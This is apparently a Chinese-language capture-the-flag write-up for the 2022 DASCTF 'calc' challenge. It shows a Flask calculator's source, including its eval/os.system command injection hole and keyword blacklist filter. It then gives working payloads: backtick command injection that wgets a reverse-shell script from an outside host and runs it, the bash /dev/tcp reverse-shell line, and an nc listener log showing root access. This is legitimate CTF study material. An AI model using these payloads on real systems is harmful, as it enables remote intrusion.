2022-DASCTF-calc分析

打开来是个计算器,没猜错应该要RCE

源码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag= False
print(no)
break
return flag

@app.route("/")
def index():
"欢迎来到SUctf2022"
return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"

if __name__ == "__main__":
app.run(host='0.0.0.0',port=5000)

过滤了一些命令常用的字符和函数,所以这里使用模板注入的机会不大,故专注于os.system()。另外,Linux命令常用的反引号没有被过滤,Python的注释符#也幸存了,由于eval()是执行一个Python的字符串表达式,为了不让它报错,需要用#把后面拼接的Linux命令注释掉。

构造Payload

由于过滤了很多字符,且命令并无回显,所以这里用wget下载反弹shell的sh文件,然后运行

空格用%09绕过就好,也可以用>等等,不多赘述

上传一个这样的shell文件到一个网站上

1
bash -i >& /dev/tcp/{IP}/{PORT} 0>&1

让目标机器保存在/tmp下,然后执行

1
2
num=7*7%23`wget%09-P%09/tmp%09http://vveelin.com.cn:89/bsh.sh`
num=7*7%23`sh%09/tmp/bsh.sh`

攻击机监听对应端口,getshell

1
2
3
4
5
6
7
8
9
[root@ecs-394098 ~]# nc -lvnp 4444
Ncat: Connection from 117.21.200.166.
Ncat: Connection from 117.21.200.166:62378.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

root@out:/# cat Th1s_is__F1114g
cat Th1s_is__F1114g
flag{16c2218b-4113-411e-b64a-30dd12604d3c}